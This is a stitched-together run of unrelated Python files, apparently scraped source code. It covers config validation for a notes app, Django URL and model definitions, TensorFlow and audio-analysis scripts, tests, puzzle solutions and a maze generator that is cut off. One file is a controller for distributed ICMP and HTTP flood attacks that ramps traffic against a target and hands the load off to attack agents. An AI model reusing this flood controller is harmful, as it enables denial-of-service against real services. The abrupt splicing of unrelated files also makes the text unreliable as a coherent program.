# Check that the config is valid
clean_config = clean_and_validate_config(config)
# Check that the parent directory exists
parent_dir = os.path.dirname(config_location)
if not os.path.exists(parent_dir):
log.warning(f'Config directory {parent_dir} ' +
f'does not exist, creating it')
os.makedirs(parent_dir)
with open(config_location, 'w') as config_file_object:
json.dump(clean_config, config_file_object)
def _modify_config(config: ShorthandConfig, updates: ShorthandConfigUpdates
) -> ShorthandConfig:
'''Update one or more fields in the config
Takes an original config and a dictionary of updates to make
The updates have the same form as the regular config but
only includes a subset of the fields
'''
if not isinstance(updates, dict):
raise ValueError('Config updates must be provided as a dictionary')
if 'notes_directory' in updates:
raise ValueError('Cannot modify the notes directory via the API')
new_config = copy.deepcopy(config)
for key, value in updates.items():
if key == 'frontend':
continue
elif key not in DEFAULT_CONFIG.keys():
raise ValueError(f'Config Update has unknown field {key}')
else:
new_config[key] = value
if 'frontend' in updates:
# Validate Provided frontend updates
if not isinstance(updates['frontend'], dict):
raise ValueError('Frontend config must be provided ' +
'as a dictionary')
for key in updates['frontend'].keys():
if key not in DEFAULT_FRONTEND_CONFIG.keys():
raise ValueError(f'Config update has unknown frontend ' +
f'config key {key}')
if new_config.get('frontend'):
new_config['frontend'].update(updates['frontend'])
else:
new_config['frontend'] = updates['frontend']
new_config = clean_and_validate_config(new_config)
return new_config
def clean_and_validate_config(config: ShorthandConfig) -> ShorthandConfig:
'''Clean and validate values from the config file as needed
Return the config if there are no issues, and raise an error
if an issue is found
'''
#TODO - Set up logging immediately, so later errors will
# be logged correctly
# Ensure that no unknown fields are present in the config
for field in config.keys():
if field not in DEFAULT_CONFIG.keys():
raise ValueError(f'Config includes unknown field "{field}"')
# Ensure that required fields are present in the config
for field in REQUIRED_FIELDS:
if field not in config.keys():
raise ValueError(f'Missing required field "{field}"')
# Ensure that the notes directory and cache directory
# paths have no trailing `/`
notes_dir = config['notes_directory']
config['notes_directory'] = notes_dir.rstrip('/')
cache_dir = config.get('cache_directory', '')
if cache_dir:
config['cache_directory'] = cache_dir.rstrip('/')
else:
log.info(f'No cache directory specified, falling back to '
f'default of {DEFAULT_CACHE_DIR}')
config['cache_directory'] = DEFAULT_CACHE_DIR
# Check config values that point to directories that must exist
directory_fields = ['notes_directory', 'cache_directory']
for field in directory_fields:
if not os.path.exists(config[field]):
raise ValueError(f'Directory {config[field]} specified for '
f'field {field} does not exist')
# Validate logging config
log_file_path = config.get('log_file_path')
if log_file_path:
log_file_dir = os.path.dirname(log_file_path)
if not os.path.exists(log_file_dir):
log.warn(f'Directory {log_file_dir} does not exist, creating it')
os.makedirs(log_file_path)
else:
log.info(f'No log file path specified, falling back to '
f'default of "{DEFAULT_LOG_FILE}"')
config['log_file_path'] = DEFAULT_LOG_FILE
log_level = config.get('log_level')
if log_level:
if log_level.upper() not in ['DEBUG', 'INFO', 'WARNING', 'WARN',
'ERROR', 'CRITICAL']:
raise ValueError(f'Invalid log level "{log_level}" specified')
config['log_level'] = log_level.upper()
else:
log.info(f'No log level specified, falling back to '
f'default of "{DEFAULT_LOG_LEVEL}"')
config['log_level'] = DEFAULT_LOG_LEVEL
log_format = config.get('log_format')
if log_format:
if not isinstance(log_format, str):
raise ValueError('log_format must be specified as a string')
pass
else:
log.info(f'No log format specified, falling back to '
f'default of "{DEFAULT_LOG_FORMAT}"')
config['log_format'] = DEFAULT_LOG_FORMAT
# Validate default directory
default_dir = config.get('default_directory')
if default_dir:
if not os.path.exists(f'{config["notes_directory"]}/{default_dir}'):
raise ValueError(f'Default directory {default_dir} does not '
f'exist within notes directory')
else:
config['default_directory'] = None
# Validate paths to utilities
grep_path = config.get('grep_path')
if not grep_path:
log.info(f'Grep path not specified, falling back to '
f'default of {DEFAULT_GREP_PATH}')
grep_path = DEFAULT_GREP_PATH
# Check for the grep path as the full path to an executable
if os.path.isfile(grep_path):
if not os.access(grep_path, os.X_OK):
raise ValueError(f'Grep at {grep_path} is not executable')
else:
log.debug(f'Found grep executable at {grep_path}')
else:
# Check for the grep path as an executable name within our system path
grep_found = False
for path in os.environ["PATH"].split(os.pathsep):
grep_executable = os.path.join(path, grep_path)
if os.path.isfile(grep_executable):
if os.access(grep_executable, os.X_OK):
grep_path = grep_executable
config['grep_path'] = grep_path
grep_found = True
log.debug(f'Found grep executable at {grep_path}')
break
else:
raise ValueError(f'Grep at {grep_executable} is '
f'not executable')
if not grep_found:
raise ValueError(f'Grep executable specified as {grep_path} '
f'could not be located')
find_path = config.get('find_path')
if not find_path:
log.info(f'Find path not specified, falling back to '
f'default of {DEFAULT_FIND_PATH}')
find_path = DEFAULT_FIND_PATH
# Check for the find path as the full path to an executable
if os.path.isfile(find_path):
if not os.access(find_path, os.X_OK):
raise ValueError(f'Find at {find_path} is not executable')
else:
log.debug(f'Found find executable at {find_path}')
else:
# Check for the find path as an executable name within our system path
find_found = False
for path in os.environ["PATH"].split(os.pathsep):
find_executable = os.path.join(path, find_path)
if os.path.isfile(find_executable):
if os.access(find_executable, os.X_OK):
find_path = find_executable
config['find_path'] = find_path
find_found = True
log.debug(f'Found find executable at {find_path}')
break
else:
raise ValueError(f'Find at {find_executable} is '
f'not executable')
if not find_found:
raise ValueError(f'Find executable specified as {find_path} '
f'could not be located')
# Validate frontend config
frontend_config = config.get('frontend')
if 'frontend' not in config.keys():
# Frontend config is missing completely
config['frontend'] = DEFAULT_FRONTEND_CONFIG
elif not isinstance(frontend_config, dict):
raise ValueError('Frontend config must be specified as a dict')
else:
# Check that there are no extra / unexpected fields
# in the frontend config
for field in frontend_config:
if field not in DEFAULT_FRONTEND_CONFIG.keys():
raise ValueError(f'Unknown field "{field}" in frontend config')
# Validate the view history limit
view_history_limit = frontend_config.get('view_history_limit')
if 'view_history_limit' not in frontend_config.keys():
config['frontend']['view_history_limit'] = \
DEFAULT_FRONTEND_CONFIG['view_history_limit']
else:
if isinstance(view_history_limit, int):
if view_history_limit < 0:
raise ValueError('View History Limit must be '
'at least zero')
elif isinstance(view_history_limit, str):
try:
config['frontend']['view_history_limit'] = \
int(view_history_limit)
except ValueError:
raise ValueError(f"Can't convert view history limit "
f'value of "{view_history_limit}" to an '
f'integer')
# Validate the map tileserver URL
map_tileserver_url = frontend_config.get('map_tileserver_url')
if 'map_tileserver_url' not in frontend_config.keys():
config['frontend']['map_tileserver_url'] = \
DEFAULT_FRONTEND_CONFIG['map_tileserver_url']
else:
if not isinstance(map_tileserver_url, str):
raise ValueError('Map Tileserver URL must be a string')
if map_tileserver_url[:7] != 'http://' and \
map_tileserver_url[:8] != 'https://':
raise ValueError('Map Tileserver URL must be a valid URL')
return config
|
from . import views
from django.conf.urls import url
from django.urls import path, include
app_name = "main"
urlpatterns = [
url(r'^$',views.homepage, name="homepage"),
url(r'^loan_type/$', views.loan_types, name='loantype'),
url(r'^client/$',views.apply_loan, name="applyloan"),
url(r'^settings/$',views.settings, name="settings"),
path('daraja/stk-push/', views.stk_push_callback, name='mpesa_stk_push_callback'),
] |
import math
import numpy as np
def batches(batch_size, features, labels):
"""
Create batches of features and labels
:param batch_size: The batch size
:param features: List of features
:param labels: List of labels
:return: Batches of (Features, Labels)
"""
assert len(features) == len(labels)
# Implement batching
output = []
temp_features = []
temp_labels = []
for b in range(0, len(features)):
temp_features.append(features[b])
temp_labels.append(labels[b])
if (math.fmod(b, batch_size) == batch_size - 1.0) or b == len(features)-1:
output.append([temp_features, temp_labels])
temp_features = []
temp_labels = []
return output
|
import layer_creater as lc
import neural_network_creater as nnc
import numpy as np
import tensorflow as tf
#训练数据准备
x_data = np.linspace(-1, 1, 300)[:, np.newaxis] #(300, 1)
noise = np.random.normal(0, 0.05, x_data.shape)
y_data = np.square(x_data) - 0.5 + noise
#定义数据节点
xs = tf.placeholder(tf.float32, [None, 1])
ys = tf.placeholder(tf.float32, [None, 1])
#定义神经网络层结构
layer_creaters = []
def lc1():
Weight1, biase1, output1 = lc.create_mlp_layer(xs, 1, 10, activation_function=tf.nn.relu)
return output1
layer_creaters.append(lc1)
def lc2(input):
Weight2, biase2, output2 = lc.create_mlp_layer(input, 10, 1)
return output2
layer_creaters.append(lc2)
prediction = nnc.mlp_create(layer_creaters)
#定义 loss 表达式
loss = tf.reduce_mean(tf.reduce_sum(tf.square(ys - prediction), 1))
#选择 optimizer 使 loss 达到最小
train_step = tf.train.GradientDescentOptimizer(0.1).minimize(loss)
#对所有 tf 变量进行初始化
init = tf.global_variables_initializer() #有变量(tf.Variable)就要初始化
sess = tf.Session()
#上面的定义都没有运算,直到 sess.run 才会运算
sess.run(init)
#迭代多次学习,sess.run optimizer
for i in range(1000):
#training train_step 和 loss 都是由 placeholder 定义的运算,所以要用 feed 传入参数
sess.run(train_step, feed_dict={xs: x_data, ys: y_data})
if i % 50 == 0:
print(sess.run(loss, feed_dict={xs: x_data, ys: y_data})) |
import Queue, threading, random, time, socket, os, struct
class Attacks(threading.Thread):
def __init__(self, attack_q, input_q, probe_1, probe_2, rate_q, application_mon_q, flag_q, http_treshold_q_rep):
threading.Thread.__init__(self) # Required for thread class
self.attack_Q = attack_q
self.input_Q = input_q
self.last_command = None
self.probe_out = probe_1
self.probe_in = probe_2
self.mon_rate_q = rate_q
self.mon_recv_q = Queue.Queue()
self.application_mon_q = application_mon_q
self.flag_q = flag_q
self.http_treshold_q_rep = http_treshold_q_rep
def perform_attack(self, attack, target, port, rate, status, duration=1000, size=100): # Traffic flood
self.attack = attack
self.rate = rate
self.target = target
self.port = port
self.status = status # "OK", if status eq "STOP", the attacker should abort right away
self.duration = duration
self.id = random.randint(1, 99999)
self.pktsize = size
self.command = {'id': self.id}
self.command[self.id] = {'attack': self.attack, 'rate': self.rate, 'target': self.target,
'duration': self.duration, 'port': self.port, 'status': self.status, 'pktsize': self.pktsize}
try:
self.attack_Q.put(self.command, False)
except Queue.Full: # Only a single command on the Queue at all times.
bogus = self.attack_Q.get(False)
self.attack_Q.put(self.command, False)
def perform_application_attack(self, attack, target, port, rate, status, get, processes, connections): # Application 'flood'
self.attack = attack
self.rate = rate
self.target = target
self.port = port
self.status = status # "OK", if status eq "STOP", the attacker should abort right away
self.get = get
self.connections = connections
self.id = random.randint(1, 99999)
self.processes = processes
self.command = {'id': self.id}
self.command[self.id] = {'attack': self.attack, 'rate': self.rate, 'target': self.target,
'processes': self.processes, 'port': self.port, 'status': self.status, 'get': self.get, 'connections': self.connections}
try:
self.attack_Q.put(self.command, False)
except Queue.Full: # Only a single command on the Queue at all times.
bogus = self.attack_Q.get(False)
self.attack_Q.put(self.command, False)
def application_flood_handler(self, cmd):
print "Started app flood handler"
command = cmd
aid = command['id']
self.init_mon_rate = command[aid]['monrate']
self.mon_rate = self.init_mon_rate
self.attack_rate = command[aid]['startrate'] # Normally 0
self.global_rate = self.mon_rate
self.increase = 1
self.flag = "do_not_ignore"
self.perform_application_attack(command[aid]['attack'], command[aid]['target'], command[aid]['port'], self.attack_rate, command[aid]['status'], command[aid]['get'], command[aid]['processes'], command[aid]['connections'])
while True:
time.sleep(2)
# IF FLAG IS NOT SET, REQUEST THE STATUS. OTHERWISE: JUST PROCEED...
if self.flag != "ignore":
try:
status = self.http_treshold_q_rep.get(True)
mon_val = float(status[1])*1000.0
except:
pass
else:
status = ["GOOD", str(1)]
try:
status2 = self.http_treshold_q_rep.get(True)
mon_val = float(status[1])*1000.0
except:
pass
if status[0] == "GOOD":
self.attack_rate += self.increase
self.perform_application_attack(command[aid]['attack'], command[aid]['target'], command[aid]['port'], self.attack_rate, command[aid]['status'], command[aid]['get'], command[aid]['processes'], command[aid]['connections'])
print "Increased rate to: ", str(self.attack_rate), " Rate per attack-agent: ", str(self.attack_rate / command[aid]['processes'])
elif status[0] == "BAD":
print "Dropping the rate by 1 increment and wait for input. \n"
self.attack_rate -= self.increase
self.perform_application_attack(command[aid]['attack'], command[aid]['target'], command[aid]['port'], self.attack_rate, command[aid]['status'], command[aid]['get'], command[aid]['processes'], command[aid]['connections'])
print "Options: 'azad' (Go on with the attack) - 'decrease' (Decrease by one increment and try again) "
flag_raw = self.flag_q.get(True) # Blocking
if flag_raw == 'decrease':
self.attack_rate -= self.increase
self.perform_application_attack(command[aid]['attack'], command[aid]['target'], command[aid]['port'], self.attack_rate, command[aid]['status'], command[aid]['get'], command[aid]['processes'], command[aid]['connections'])
elif flag_raw == 'kill_it':
print "Going on with the attack..."
self.flag = "ignore"
# Write statistics to file for graphing
GRAPH = 1
if GRAPH == 1:
try:
global_rate_file = open('/tmp/global.csv', 'a')
msgbuffer = (str(int(self.attack_rate)) + "," + str(mon_val) + "\n")
global_rate_file.write(msgbuffer)
global_rate_file.close()
except:
pass
def traffic_flood_handler(self, cmd):
command = cmd
aid = command['id']
self.global_rate = command[aid]['startrate']
self.attack_rate = self.global_rate * (0.95)
self.increase = 400 # Rate increments
self.init_mon_rate = self.global_rate * (0.05) - (8 * self.increase)
self.mon_rate = self.init_mon_rate
self.no_agents = 3.0 # Number of agents. Hardcoded for now.
print "Init initial attack rate..."
self.perform_attack(command[aid]['attack'], command[aid]['target'],command[aid]['port'],(self.attack_rate/self.no_agents),command[aid]['status'], command[aid]['pktsize'])
message = {"target": command[aid]['target'], "pktsize":command[aid]['pktsize'], "monrate":command[aid]['monrate']}
self.mon_rate_q.put(message)
request = {'command': "number_received"}
time.sleep(1) # Wait for packets to be generated + RTT to receiver
J = 0
K = 0
flag = None
last_extrarate = 0
while True:
self.probe_out.put(request)
status = self.probe_in.get(True) # Blocks till answer is recv
#print "K","Recv ", "Tolerated recv", "Expected rate", "Global rate"
#print K, status, (self.mon_rate - (self.mon_rate*0.1)), self.mon_rate, self.global_rate, "\n"
if K < 30:
status = self.mon_rate
K += 1
#print (float(1) - ((float(self.mon_rate) - float(status))/(float(self.attack_rate) + float(self.mon_rate))))
if (((float(1) - ((float(self.mon_rate) - float(status))/(float(self.attack_rate) + float(self.mon_rate)))) > float(0.99)) and flag != 'manual') or (flag == 'kill_it'): # Check threshold or flag override
# if not flag:
# print " Attack falls within margins. Increasing rate by # ", str(self.increase)
# else:
# print " Increasing the attack rate even further: ", str(self.increase)
print "Normal: True"
if self.mon_rate >= (self.init_mon_rate + ((self.increase) * 8)): # Handoff attack every 10 steps
self.global_rate += self.increase #AZAD self.global_rate = self.attack_rate + self.init_mon_rate
self.attack_rate = 0.95 * self.global_rate #AZAD += (self.mon_rate - self.init_mon_rate)
print " Handing off attack to attack agents by # ", str(self.mon_rate - self.init_mon_rate), " Total rate: ", str(self.global_rate)
self.perform_attack(command[aid]['attack'], command[aid]['target'],command[aid]['port'],(self.attack_rate/self.no_agents),command[aid]['status'], command[aid]['pktsize'])
self.init_mon_rate = (0.05 * self.global_rate) - (8 * self.increase) #AZAD
self.mon_rate = self.init_mon_rate
else:
if J >= 1: # was 2
self.mon_rate += self.increase
J = 0
message = {"target": command[aid]['target'], "pktsize":command[aid]['pktsize'], "monrate":self.mon_rate}
self.mon_rate_q.put(message) # Update monflood_send with new rate
elif flag == 'manual':
print "Manual control over attack"
FC = open('command.conf', 'r')
extrarate = FC.readline() #rounded rates
FC.close()
if extrarate:
print extrarate
extrarate = int(float(extrarate))
self.global_rate += extrarate
self.attack_rate = 0.95 * self.global_rate
self.perform_attack(command[aid]['attack'], command[aid]['target'],command[aid]['port'],(self.attack_rate/self.no_agents),command[aid]['status'], command[aid]['pktsize'])
print " New (manual) attack rate: ", str(self.attack_rate)
message = {"target": command[aid]['target'], "pktsize":command[aid]['pktsize'], "monrate":self.mon_rate}
self.mon_rate_q.put(message) # Update monflood_send with new rate
last_extrarate = extrarate
else:
#print "Stopping attack. Or should we reset attack_rate to attack_rate - *2000* and start again. 'Sustained attack' "
print "Halting attack. Proceed (Option: azad), decrease (option: decrease) or manual control (option: manual)?"
flag = self.flag_q.get(True)
if flag == 'decrease':
self.attack_rate = self.attack_rate - self.mon_rate
self.mon_rate = self.init_mon_rate
self.global_rate = self.attack_rate + self.mon_rate
if flag == 'manual':
# take manual control over the attack from F:command.conf
print "Taking manual control of the attack..."
elif flag == 'kill_it':
print "Going on with the attack..."
# Write statistics to file for graphing
GRAPH = 1
if GRAPH == 1:
try:
global_rate_file = open('/tmp/global.csv', 'a')
msgbuffer = (str(self.global_rate) + "," + str(int(self.attack_rate)) + "," + str(int(self.mon_rate)) + "," + str(int(status)) + "\n")
global_rate_file.write(msgbuffer)
global_rate_file.close()
except:
pass
J += 1
time.sleep(2) # 2 second between 'probes'
# 'Main'
def run(self):
traffic_floods = ['ICMPFLOOD'] # Bandwidth attacks (Array)
application_floods = ['HTTPFLOOD'] # Application level attacks (Array)
# Reset graph file before starting
GRAPH = 1
if GRAPH == 1:
try:
global_rate_file = open('/var/www/html/RGraph/RP2/global.csv', 'w')
global_rate_file.write("0,0,0,0\n")
global_rate_file.close()
except:
pass
while 1:
try:
self.new_command = self.input_Q.get(True, 0.05)
#print self.new_command
except Queue.Empty:
self.new_command = None
if self.new_command:
aid = self.new_command['id']
if self.new_command[aid]['attack'] in traffic_floods:
self.traffic_flood_handler(self.new_command)
elif self.new_command[aid]['attack'] in application_floods:
self.application_flood_handler(self.new_command)
|
#!/usr/bin/python3
import os
import sys
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
from scipy.io import wavfile
from scipy import signal
def D1(Y, Yhat):
NormYhat = (Yhat / np.sqrt(np.sum(Yhat**2)))
NormY = (Y / np.sqrt(np.sum(Y**2)))
return np.sum((NormYhat - NormY)**2)
def D2(Y, Yhat):
return np.sum(Y**2) / np.sum((Yhat - Y)**2)
def D3(Y, Yhat):
return np.sum((Y * (np.log10(Y / Yhat) - 1) + Yhat)**2)
def evaluate(path, W, H):
T = H.shape[1] # Number of time frames
F = W.shape[0] # Frequency ticks
K = W.shape[1] # Number of components
compNMF = np.empty((K, F, T))
for k in range(K):
curW = W[:, k, None]
curH = H[None, k, :] # Slice while maintaining dims
compNMF[k, :, :] = (curW * curH)
files = []
comp = np.empty((K, F, T))
for k, file in enumerate(os.listdir(path)):
if file.endswith('.wav'):
fs, data = wavfile.read(os.path.join(path, file))
x = data[:,0] if len(data.shape) == 2 else data
winLen = int(40e-3 * fs)
noverlap = winLen // 2
win = signal.windows.hamming(winLen, sym=False)
f, t, X = signal.stft(x, fs, win, winLen, noverlap, winLen, detrend=False, return_onesided=True, boundary=None)
comp[k, :, :] = np.abs(X)
files = files + [file]
print('Componets x Files x Eval')
for i, Yhat in enumerate(compNMF):
print('\nComponent {}'.format(i))
for j, Y in enumerate(comp):
print('File:', files[j])
print('D1:', D1(Y, Yhat))
print('D2:', D2(Y, Yhat))
print('D3:', D3(Y, Yhat))
if __name__ == '__main__':
# Path to the Audio files, Path to W.npy, H.npy
argc = len(sys.argv) - 1
if argc == 2:
W = np.load(os.path.join(sys.argv[2], 'W.npy'))
H = np.load(os.path.join(sys.argv[2], 'H.npy'))
evaluate(sys.argv[1], W, H) |
from django.db import models
from transaction.models import ChartOfAccount
import datetime
from django.contrib.auth.models import User
from user.models import Company_info
from inventory.models import Add_products
class CompanyUser(models.Model):
user_id = models.IntegerField()
company_id = models.ForeignKey(Company_info, models.SET_NULL, blank = True, null = True)
class RfqCustomerHeader(models.Model):
rfq_no = models.CharField(max_length = 100, unique = True)
date = models.DateField(default = datetime.date.today)
attn = models.CharField(max_length = 100)
follow_up = models.DateField(blank = True)
show_notification = models.BooleanField(default = True)
footer_remarks = models.TextField()
company_id = models.ForeignKey(Company_info, models.SET_NULL, blank = True, null = True)
account_id = models.ForeignKey(ChartOfAccount, models.SET_NULL, blank=True, null=True)
user_id = models.ForeignKey(User,models.SET_NULL, blank = True, null = True)
class RfqCustomerDetail(models.Model):
item_id = models.ForeignKey(Add_products, models.SET_NULL, blank = True, null = True)
quantity = models.DecimalField(max_digits = 8, decimal_places = 2)
rfq_id = models.ForeignKey(RfqCustomerHeader, on_delete = models.CASCADE)
class QuotationHeaderCustomer(models.Model):
quotation_no = models.CharField(max_length = 100, unique = True)
date = models.DateField(default = datetime.date.today)
attn = models.CharField(max_length = 100)
prc_basis = models.CharField(max_length = 100)
leadtime = models.CharField(max_length = 100)
validity = models.CharField(max_length = 100)
payment = models.CharField(max_length = 100)
yrref = models.CharField(max_length = 100)
remarks = models.CharField(max_length = 100)
currency = models.CharField(max_length = 100)
exchange_rate = models.DecimalField(max_digits = 8, decimal_places = 2)
follow_up = models.DateField(blank = True)
show_notification = models.BooleanField(default = True)
footer_remarks = models.TextField()
company_id = models.ForeignKey(Company_info, models.SET_NULL, blank = True, null = True)
account_id = models.ForeignKey(ChartOfAccount, models.SET_NULL,blank=True,null=True,)
user_id = models.ForeignKey(User,models.SET_NULL, blank = True, null = True)
class QuotationDetailCustomer(models.Model):
item_id = models.ForeignKey(Add_products, models.SET_NULL, blank = True, null = True)
quantity = models.DecimalField(max_digits = 8, decimal_places = 2)
unit_price = models.DecimalField(max_digits = 8, decimal_places = 2)
remarks = models.CharField(max_length = 100)
quotation_id = models.ForeignKey(QuotationHeaderCustomer, on_delete = models.CASCADE)
class PoHeaderCustomer(models.Model):
po_no = models.CharField(max_length = 100, unique = True)
date = models.DateField(default = datetime.date.today)
attn = models.CharField(max_length = 100)
prc_basis = models.CharField(max_length = 100)
po_client = models.CharField(max_length = 100)
leadtime = models.CharField(max_length = 100)
validity = models.CharField(max_length = 100)
payment = models.CharField(max_length = 100)
remarks = models.CharField(max_length = 100)
currency = models.CharField(max_length = 100)
exchange_rate = models.DecimalField(max_digits = 8, decimal_places = 2)
follow_up = models.DateField(blank = True)
show_notification = models.BooleanField(default = True)
footer_remarks = models.TextField()
account_id = models.ForeignKey(ChartOfAccount, models.SET_NULL,blank=True,null=True,)
company_id = models.ForeignKey(Company_info, models.SET_NULL, blank = True, null = True)
user_id = models.ForeignKey(User,models.SET_NULL, blank = True, null = True)
class PoDetailCustomer(models.Model):
item_id = models.ForeignKey(Add_products, models.SET_NULL, blank = True, null = True)
quantity = models.DecimalField(max_digits = 8, decimal_places = 2)
unit_price = models.DecimalField(max_digits = 8, decimal_places = 2)
remarks = models.CharField(max_length = 100)
quotation_no = models.CharField(max_length = 100)
po_id = models.ForeignKey(PoHeaderCustomer, on_delete = models.CASCADE)
class DcHeaderCustomer(models.Model):
dc_no = models.CharField(max_length = 100)
date = models.DateField(default = datetime.date.today)
footer_remarks = models.TextField()
show_notification = models.BooleanField(default = True)
follow_up = models.DateField(blank = True)
cartage_amount = models.DecimalField(max_digits = 8, decimal_places = 2)
po_no = models.CharField(max_length = 100)
account_id = models.ForeignKey(ChartOfAccount, models.SET_NULL,blank=True,null=True)
user_id = models.ForeignKey(User,models.SET_NULL, blank = True, null = True)
company_id = models.ForeignKey(Company_info, models.SET_NULL, blank = True, null = True)
class DcDetailCustomer(models.Model):
item_id = models.ForeignKey(Add_products, models.SET_NULL, blank = True, null = True)
description = models.CharField(max_length = 100)
quantity = models.DecimalField(max_digits = 8, decimal_places = 2)
accepted_quantity = models.IntegerField()
returned_quantity = models.IntegerField()
po_no = models.CharField(max_length = 100)
dc_id = models.ForeignKey(DcHeaderCustomer, on_delete = models.CASCADE)
|
from django.core.management.base import BaseCommand, CommandError
from django.core.exceptions import ObjectDoesNotExist
from filmmap.models import Film, FilmLocation, FilmActor
from decimal import *
import re
import csv
from datetime import datetime
class CSVParser(object):
def __init__(self, filename):
self.infile = open(filename, "r")
self.reader = csv.reader(self.infile)
self.got_header = False
def readlines(self):
for row in self.reader:
if not self.got_header:
self.got_header = True
continue
else:
if row != "":
yield row
def close(self):
self.infile.close()
class Command(BaseCommand):
help = 'Imports film location data into database.'
def add_arguments(self, parser):
# Positional arguments
parser.add_argument('file', nargs='+', type=str)
def handle(self, *args, **options):
# Columns of csv file are:
# 0. Title
# 1. Release year
# 2. location
# 3. fun facts
# 4. production company
# 5. distributor
# 6. writer
# 7. actor 1
# 8. actor 2
# 9. actor 3
parser = CSVParser(options['file'][0])
for row in parser.readlines():
self.stdout.write("Title: "+row[0])
self.stdout.write("Release year: "+row[1])
film, created = Film.objects.get_or_create(title=row[0], release_year=row[1])
if created:
film.production_company = row[4]
film.distributor = row[5]
film.writer = row[6]
film.save()
if row[7] != None and row[7] != '':
actor, created1 = FilmActor.objects.get_or_create(film=film, actor=row[7])
if row[8] != None and row[8] != '':
actor2, created2 = FilmActor.objects.get_or_create(film=film, actor=row[8])
if row[9] != None and row[9] != '':
actor3, created3 = FilmActor.objects.get_or_create(film=film, actor=row[9])
film_location, location_created = FilmLocation.objects.get_or_create(film=film, name=row[2], fun_facts=row[3], defaults={'address':row[2]})
parser.close()
|
import pytest
import os
import pandas as pd
from ticclat.utils import chunk_df, read_json_lines, write_json_lines, \
json_line, iterate_wf, chunk_json_lines, read_ticcl_variants_file
from . import data_dir
def test_chunk_df_smaller_than_num():
data = pd.DataFrame({'number': range(5)})
i = 0
for c in chunk_df(data):
i += 1
assert i == 1
def test_chunk_df_larger_than_num():
data = pd.DataFrame({'number': range(5)})
i = 0
for c in chunk_df(data, 1):
i += 1
assert i == 5
def test_read_and_write_json_lines(fs):
objects = [{'a': 1, 'b': 2}, {'a': 3, 'b': 4}, {'a': 5, 'b': 6}]
fname = 'objects'
f = open(fname, 'w')
total = write_json_lines(f, objects)
f.close()
f = open(fname, 'r')
assert os.path.exists(fname)
assert total == len(objects)
results = [o for o in read_json_lines(f)]
f.close()
assert objects == results
def test_read_and_write_json_lines_empty(fs):
objects = []
fname = 'objects'
f = open(fname, 'w')
write_json_lines(f, objects)
f.close()
f = open(fname, 'r')
assert os.path.exists(fname)
assert os.path.getsize(fname) == 0
results = [o for o in read_json_lines(f)]
f.close()
assert objects == results
def test_json_line():
obj = {'a': 1, 'b': 2}
assert json_line(obj) == '{"a": 1, "b": 2}\n'
def test_iterate_wf():
inp = ['wf1', 'wf2', 'wf3']
outp = [{'wordform': 'wf1'}, {'wordform': 'wf2'}, {'wordform': 'wf3'}]
res = list(iterate_wf(inp))
assert outp == res
def test_chunk_json_lines_with_remainder(fs):
out_file_path = "wordforms"
out_file = open(out_file_path, 'w')
write_json_lines(out_file, iterate_wf(["wf1", "wf2", "wf3", "wf4", "wf5"]))
out_file.close()
out_file = open(out_file_path, 'r')
res = list(chunk_json_lines(out_file, 2))
out_file.close()
outp = [
[{"wordform": "wf1"}, {"wordform": "wf2"}],
[{"wordform": "wf3"}, {"wordform": "wf4"}],
[{"wordform": "wf5"}],
]
assert outp == res
def test_chunk_json_lines_without_remainder(fs):
out_file_path = "wordforms"
out_file = open(out_file_path, 'w')
write_json_lines(out_file, iterate_wf(["wf1", "wf2", "wf3", "wf4"]))
out_file.close()
out_file = open(out_file_path, 'r')
res = list(chunk_json_lines(out_file, 2))
out_file.close()
outp = [[{'wordform': 'wf1'}, {'wordform': 'wf2'}],
[{'wordform': 'wf3'}, {'wordform': 'wf4'}]]
assert outp == res
@pytest.mark.datafiles(os.path.join(data_dir(), 'ticcl_variants.txt'))
def test_read_ticcl_variants_file(datafiles):
variants_file = os.path.join(str(datafiles), 'ticcl_variants.txt')
df = read_ticcl_variants_file(variants_file)
print(df)
assert df.shape == (2, 7)
|
__author__ = 'sidney'
|
class Solution:
def fractionToDecimal(self, numerator, denominator):
n, r = divmod(abs(numerator), abs(denominator))
sign = '-' if numerator*denominator < 0 else ''
res = [sign + str(n), '.']
stack = []
while r not in stack:
stack.append(r)
n, r = divmod(r*10, abs(denominator))
res.append(str(n))
idx = stack.index(r)
print res, stack, r, idx
res.insert(idx + 2, '(')
res.append(')')
return ''.join(res).replace('(0)', '').rstrip('.')
if __name__ == '__main__':
test = Solution()
print test.fractionToDecimal(4, 333) |
from exceptions import Exception
# An entity of 'model' with the unique 'field' already exists
class FieldExistsError(Exception):
def __init__(self, model, field):
self.model = model
self.field = field
def json_dict(self):
return {'field_exists_error': {'model': self.model, 'field': self.field}}
class LoginError(Exception):
def json_dict(self):
return {'login_error': {}}
class FormError(Exception):
def __init__(self, field_errors):
self.field_errors = field_errors
def json_dict(self):
field_errors = [field_error.json_dict() for field_error in self.field_errors]
return {'form_error': {'field_errors': field_errors}}
class FieldRequiredError:
def __init__(self, fieldname):
self.fieldname = fieldname
def json_dict(self):
return {'field_required_error': {'fieldname': self.fieldname}}
def check_form(form, required_fields):
field_errors = list()
for required_field in required_fields:
# check if key exists and not empty string
if required_field not in form or not form[required_field]:
field_errors += [FieldRequiredError(required_field)]
if field_errors:
raise FormError(field_errors)
class EntityNotExistsError(Exception):
def __init__(self, model, id):
self.model = model
self.id = id
def json_dict(self):
return {'entity_not_exists_error': {'model': self.model, 'id': self.id}}
|
"""Maze generation and path finding
Emir Farid MOHD RODZI
"""
from random import shuffle, randrange
class Cell:
"""
Cell objects represent a single maze location with up-to 4 walls.
The .N, .E, .S, .W attributes represent the walls in the North,
East, South and West directions. If the attribute is True, there is a
wall in the given direction.
The .x and .y attributes store the coordinates of the cell.
"""
def __init__(self, x, y):
self.x = x
self.y = y
self.N = True
self.E = True
self.S = True
self.W = True
self.visited = False
self.coordinates = ['N', 'S', 'E', 'W']
def remove_wall(self, direction):
"""
Remove one wall - keep all neighbors consistent
Direction is one of these strings: 'N', 'E', 'S', 'W'
"""
direction = direction.upper()
loc = ' @(x=%d, y=%d)' % (self.x, self.y)
if direction == 'W':
if self.x < 1:
raise ValueError('cannot remove side wall on west' + loc)
if self.W:
self.W = False
assert maze[self.x - 1][self.y].E
maze[self.x - 1][self.y].E = False
if direction == 'E':
if self.x >= size_x - 1:
raise ValueError('cannot remove side wall on east' + loc)
if self.E:
self.E = False
assert maze[self.x + 1][self.y].W
maze[self.x + 1][self.y].W = False
if direction == 'N':
if self.y < 1:
raise ValueError('cannot remove side wall on north' + loc)
if self.N:
self.N = False
assert maze[self.x][self.y - 1].S
